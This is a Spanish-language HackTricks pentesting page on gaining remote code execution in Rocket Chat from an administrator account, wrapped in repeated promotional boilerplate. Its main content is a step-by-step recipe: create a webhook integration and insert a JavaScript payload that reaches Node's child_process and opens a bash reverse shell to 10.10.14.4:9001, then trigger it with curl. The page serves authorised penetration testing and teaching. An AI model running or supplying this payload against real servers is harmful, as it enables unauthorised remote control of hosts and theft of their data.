hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

Rocket Chat

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

• Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
• Consigue el merchandising oficial de PEASS & HackTricks
• Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
• Únete al 💬 grupo de Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
• Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.

RCE

Si eres administrador dentro de Rocket Chat, puedes obtener RCE.

• Ve a Integraciones y selecciona Nueva Integración y elige cualquiera: WebHook Entrante o WebHook Saliente.
• /admin/integrations/incoming

• Según la documentación, ambos utilizan ES2015 / ECMAScript 6 (básicamente JavaScript) para procesar los datos. Así que obtengamos una shell reversa para javascript como:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• Configura el WebHook (el canal y el usuario que publica deben existir):

• Configura el script de WebHook:

• Guarda los cambios
• Obtén la URL del WebHook generado:

• Llámalo con curl y deberías recibir la rev shell

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

• Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
• Consigue el merchandising oficial de PEASS & HackTricks
• Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
• Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.